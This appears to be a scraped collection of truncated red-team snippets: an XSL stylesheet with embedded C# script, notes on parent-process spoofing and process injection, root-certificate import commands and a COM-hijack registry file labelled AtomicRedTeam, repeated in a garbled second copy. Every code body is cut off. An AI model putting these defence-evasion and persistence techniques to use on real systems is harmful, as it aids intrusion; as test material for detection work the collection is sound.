Moriarty2016

## JankyAF.xsl
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
  xmlns:msxsl="urn:schemas-microsoft-com:xslt"
  xmlns:u="urn:my-scripts">
    <!--
	'<a/>' > blah.txt
	$xslt = New-Object System.Xml.Xsl.XslTransform
	$xslt.Load("$pwd\JankyAF.xsl");
	$xslt.Transform("$pwd\blah.txt","$pwd\blah.txt")
  -->
  <msxsl:script language="C#" implements-prefix="u">

## GetSystem.ps1
<#

$owners = @{}
gwmi win32_process |% {$owners[$_.handle] = $_.getowner().user}
get-process | select processname,Id,@{l="Owner";e={$owners[$_.id.tostring()]}}

#>

#Simple powershell/C# to spawn a process under a different parent process
#Launch PowerShell As Administrator

## Inject.cs
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;

public class TestClass
{

	public TestClass()
	{}

## Numbers.Xml
<?xml version='1.0'?>
<data>
  <circle>
    <radius>12</radius>
  </circle>
  <circle>
    <radius>37.5</radius>
  </circle>
</data>

## Numerics.cs
using System;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;


/*
Author: Casey Smith, Twitter: @subTee

## script.ps1

#Verify Not Present
( Get-ChildItem Cert:\CurrentUser\Root | Where-Object {$_.Subject -match "__Interceptor_Trusted_Root" })
#Import-Certificate
( Get-ChildItem -Path C:\Test\thing.cer ) | Import-Certificate -CertStoreLocation cert:\CurrentUser\Root
#Prompted
Remove-Item -Path cert:\CurrentUser\Root\5C205339AE9FA846FA99D3FFF0CDEE65EB8D8E99


## winlogon.reg
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
	<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
	xmlns:msxsl="urn:schemas-microsoft-com:xslt"
	xmlns:u="urn:my-scripts">
	<!--
	'<a/>' > blah.txt
	$xslt = New-Object System.Xml.Xsl.XslTransform
	$xslt.Load("$pwd\JankyAF.xsl");
	$xslt.Transform("$pwd\blah.txt","$pwd\blah.txt")
	-->
	<msxsl:script language="C#" implements-prefix="u">
	<#

	$owners = @{}
	gwmi win32_process \|% {$owners[$_.handle] = $_.getowner().user}
	get-process \| select processname,Id,@{l="Owner";e={$owners[$_.id.tostring()]}}

	#>

	#Simple powershell/C# to spawn a process under a different parent process
	#Launch PowerShell As Administrator
	using System;
	using System.Diagnostics;
	using System.Runtime.InteropServices;
	using System.Text;

	public class TestClass
	{

	public TestClass()
	{}
	<?xml version='1.0'?>
	<data>
	<circle>
	<radius>12</radius>
	</circle>
	<circle>
	<radius>37.5</radius>
	</circle>
	</data>
	using System;
	using System.Diagnostics;
	using System.Reflection;
	using System.Configuration.Install;
	using System.Runtime.InteropServices;



	/*
	Author: Casey Smith, Twitter: @subTee

	#Verify Not Present
	( Get-ChildItem Cert:\CurrentUser\Root \| Where-Object {$_.Subject -match "__Interceptor_Trusted_Root" })
	#Import-Certificate
	( Get-ChildItem -Path C:\Test\thing.cer ) \| Import-Certificate -CertStoreLocation cert:\CurrentUser\Root
	#Prompted
	Remove-Item -Path cert:\CurrentUser\Root\5C205339AE9FA846FA99D3FFF0CDEE65EB8D8E99
	Windows Registry Editor Version 5.00
	[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00]
	@="AtomicRedTeam"
	[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00\CLSID]
	@="{00000001-0000-0000-0000-0000FEEDACDC}"
	[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam]
	@="AtomicRedTeam"
	[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam\CLSID]
	@="{00000001-0000-0000-0000-0000FEEDACDC}"
	[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]